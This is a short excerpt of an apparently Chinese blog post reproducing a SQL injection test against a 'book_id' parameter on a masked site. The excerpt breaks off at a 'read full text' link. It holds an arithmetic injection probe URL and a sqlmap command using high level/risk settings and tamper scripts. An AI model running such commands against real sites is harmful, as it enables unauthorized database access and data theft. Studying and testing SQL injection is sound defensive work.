sql注入工具使用复现
前言 最近收到一个这样的需求,http://m.xxx.com/books/areward参数book_id 存在 sql注入漏洞 http://m.xxxx.com/books/areward?book_id=1084/((6-4)*(2-1)-1)&gift_id=1 漏洞语句 漏洞证明语句: python3 sqlmap.py -u "http://m.xxx.com/books/areward?book_id=1&gift_id=1" -p book_id --level=5 --risk=3 --tamper=space2comment.py,bet...
查看全文